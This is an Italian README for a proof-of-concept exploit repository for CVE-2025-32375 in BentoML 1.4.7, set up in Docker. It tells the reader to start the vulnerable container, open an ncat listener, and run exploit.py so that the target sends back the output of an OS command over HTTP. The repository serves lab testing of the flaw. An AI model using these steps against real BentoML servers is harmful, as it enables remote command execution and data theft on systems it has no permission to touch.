
Questo repository contiene tutto il necessario per eseguire un exploit PoC per CVE-2025-32375 in un ambiente Docker. Esegue l'ultima versione vulnerabile di BentoML (1.4.7).
Avvia il container vulnerabile:
docker compose up
Crea un listener (es. ncat):
ncat -klnv 1337
Esegui l'exploit:
python3 exploit.py
Dovresti ricevere una richiesta HTTP nella finestra di ncat con il contenuto del comando del sistema operativo (id di default) se tutto ha funzionato come previsto.